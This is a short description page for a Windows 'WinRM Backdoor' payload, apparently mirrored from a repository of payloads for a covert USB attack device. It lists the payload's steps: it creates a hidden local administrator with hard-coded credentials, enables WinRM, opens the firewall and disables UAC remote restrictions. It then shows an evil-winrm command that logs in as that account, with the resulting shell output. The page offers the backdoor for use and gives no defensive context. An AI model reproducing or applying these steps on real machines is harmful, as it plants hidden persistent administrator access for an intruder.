mirror of https://github.com/hak5/omg-payloads.git
832 B
832 B
"Microsoft Windows" WinRM Backdoor
- Title: "Microsoft Windows" WinRM Backdoor
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
Description
- Adds a user account (OMG_User:OMG_P@ssW0rD).
- Adds this local user to local administrator group.
- Enables "Windows Remote Management" with default settings.
- Adds a rule to the firewall.
- Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
- Hides this user account.
Exploitation
The connection identifiers will be those defined by the values : OMG_User and OMG_P@ssW0rD.
hacker@hacker-computer:~$ evil-winrm --ip <TARGET> --user OMG_User --password 'OMG_P@ssW0rD'
*Evil-WinRM* PS C:\Users\OMG_User\Documents> whoami
desktop-xxxxxxx\omg_user